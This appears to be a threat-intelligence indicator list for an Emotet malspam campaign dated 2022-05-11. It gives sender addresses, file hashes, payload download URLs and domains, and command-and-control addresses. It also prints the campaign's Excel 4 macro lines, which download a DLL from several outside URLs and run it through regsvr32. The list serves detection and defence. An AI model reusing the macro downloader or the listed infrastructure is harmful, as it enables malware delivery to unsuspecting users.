/
2022-05-11 Emotet IOCs
128 lines (117 loc) · 3.72 KB
/
2022-05-11 Emotet IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
THREAT IDENTFICATION: EMOTET (E4)
SUBJECTS OBSERVED
All subjects were from previously stolen email threads.
SENDERS OBSERVED
ecorvalan@utejgn.com.ar
info1@wafindonesia.com
kic@kstcci.or.jp
langiscote@digicom.qc.ca
m.nishida@autoyohin-k.jp
mjson@c-rainbow.co.kr
subirbanerjee@plastofab.com
usuki@staff-tokai.com
ZIP FILE HASHES
2021e6dd2e880de3ce6d751313674a76
3c3b3ad5331206975e2f264dd606e9f3
3c8db4088a6fa9f4211fb1e6d8f31ad7
827bbb0bb37d4176d5f8dce351351e4b
XLS FILE HASHES
33dd66bc99b4cd70a0af2917fc9e1f8e
3b66d62ec7f82c44ea03e0f0adc54432
7913ae084f311565b4f6215b206dac47
fbb35bd387fe755245b9d96d38aefd86
5363618c84d13563e414707cd94001e2
869e1f35f35128667d88dce435eaba0b
EXCEL4 MACROS
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://easiercommunications.com/wp-content/w/","..\wurod.ocx",0,0)
=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dulichdichvu.net/libraries/QhtrjCZymLp5EbqOdpKk/","..\wurod.ocx",0,0))
=IF(HRHRE2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.whow.fr/wp-includes/H54Fgj0tG/","..\wurod.ocx",0,0))
=IF(HRHRE3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://genccagdas.com.tr/assets/TTHOm833iNn3BxT/","..\wurod.ocx",0,0))
=IF(HRHRE4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://heaventechnologies.com.pk/apitest/xdeAU0rx26LT9I/","..\wurod.ocx",0,0))
=IF(HRHRE5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://goonboy.com/goonie/bSFz7Av/","..\wurod.ocx",0,0))
=IF(HRHRE6<0, CLOSE(0),)
=EXEC("C:\Windows\System32\regsvr32.exe ..\wurod.ocx")
=RETURN()
EMOTET PAYLOAD DOWNLOAD URLS
http://easiercommunications.com/wp-content/w/
http://dulichdichvu.net/libraries/QhtrjCZymLp5EbqOdpKk/
https://www.whow.fr/wp-includes/H54Fgj0tG/
http://genccagdas.com.tr/assets/TTHOm833iNn3BxT/
http://heaventechnologies.com.pk/apitest/xdeAU0rx26LT9I/
http://goonboy.com/goonie/bSFz7Av/
EMOTET PAYLOAD DOWNLOAD DOMAINS
dulichdichvu.net
easiercommunications.com
genccagdas.com.tr
goonboy.com
heaventechnologies.com.pk
whow.fr
EMOTET PAYLOAD FILE HASHES
7c826bf26607d2339e8d1927bc690ec5
7e0fc6acee0f532c3aacf8f8de17b705
9b00913a8bfd37fb3923f7406f989f61
fcd4b694b100e6e09c34cbdb13bcddb1
EMOTET C2s
http://23.239.0.12:443
http://150.95.66.124:8080
http://1.234.21.73:7080
http://216.158.226.206:443
http://119.193.124.41:7080
http://206.189.28.199:8080
http://94.23.45.86:4143
http://189.126.111.200:7080
http://77.81.247.144:8080
http://213.241.20.155:443
http://160.16.142.56:8080
http://129.232.188.93:443
http://45.118.115.99:8080
http://72.15.201.15:8080
http://172.104.251.154:8080
http://209.250.246.206:443
http://58.227.42.236:80
http://151.106.112.196:8080
http://45.235.8.30:8080
http://173.212.193.249:8080
http://27.54.89.58:8080
http://51.91.7.5:8080
http://203.114.109.124:443
http://201.94.166.162:443
http://146.59.226.45:443
http://185.8.212.130:7080
http://102.222.215.74:443
http://45.176.232.124:443
http://46.55.222.11:443
http://103.75.201.2:443
http://82.165.152.127:8080
http://101.50.0.91:8080
http://185.4.135.165:8080
http://110.232.117.186:8080
http://212.24.98.99:8080
http://164.68.99.3:8080
http://159.65.88.10:8080
http://1.234.2.232:8080
http://188.44.20.25:443
http://51.254.140.238:7080
http://5.9.116.246:8080
http://153.126.146.25:7080
http://79.137.35.198:8080
http://107.182.225.142:8080
http://212.237.17.99:8080
http://183.111.227.137:8080
http://103.132.242.26:8080
http://103.70.28.102:8080
http://51.91.76.89:8080
http://158.69.222.101:443
http://185.157.82.211:8080
http://167.172.253.162:8080
http://197.242.150.244:8080
http://196.218.30.83:443
http://209.126.98.206:8080
http://149.56.131.28:8080
http://167.99.115.35:8080
http://91.207.28.33:8080
http://134.122.66.193:8080
http://209.97.163.214:443
http://131.100.24.231:80
http://163.44.196.120:8080
http://103.43.46.182:443